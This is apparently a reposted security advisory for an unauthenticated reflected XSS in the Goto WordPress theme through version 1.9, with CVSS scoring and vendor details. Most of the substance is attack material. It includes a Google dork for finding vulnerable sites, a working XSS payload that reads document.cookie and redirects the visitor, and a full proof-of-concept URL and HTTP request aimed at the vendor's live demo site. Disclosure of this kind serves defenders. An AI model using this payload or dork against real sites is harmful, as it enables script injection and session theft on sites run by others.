Goto WordPress Theme <= 1.9 - Unauthenticated Reflected XSS

2021.04.01
ru m0ze (RU) ru
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

/*! - # VULNERABILITY: Goto WordPress Theme <= 1.9 - Unauthenticated Reflected XSS - # GOOGLE DORK: inurl:/wp-content/themes/goto/ - # DATE: 2021-02-10 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: BoostifyThemes [ https://boostifythemes.com ] - # SOFTWARE VERSION: <= 1.9 - # SOFTWARE LINK: https://themeforest.net/item/goto-tour-travel-wordpress-theme/21822828 - # CVSS: AV:N/AC:L/PR:N/UI:N/S:C - # CWE: CWE-79 - # CVE: N/A */ ### -- [ Info: ] [i] An Unauthenticated Reflected XSS vulnerability was discovered in the Goto theme through v1.9 for WordPress. [i] Vulnerable parameter(s): ?keywords= and ?start_date=. ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payload: ] [$] <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);location=`https://m0ze.ru`;//> ### -- [ PoC | Unauthenticated Reflected XSS | Search query: ] [!] https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&avaibility=13 [!] GET /demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3Blocation%3D%60https%3A%2F%2Fm0ze.ru%60%3B%2F%2F%3E&avaibility=13 HTTP/1.1 Host: boostifythemes.com ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze

References:

https://m0ze.ru/vulnerability/[2021-02-10]-[WordPress]-[CWE-79]-Goto-WordPress-Theme-v1.9.txt
https://twitter.com/vladm0ze
https://www.youtube.com/channel/UCFaIIy9bITw45elW3UXuqrQ/featured
https://github.com/m0ze


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top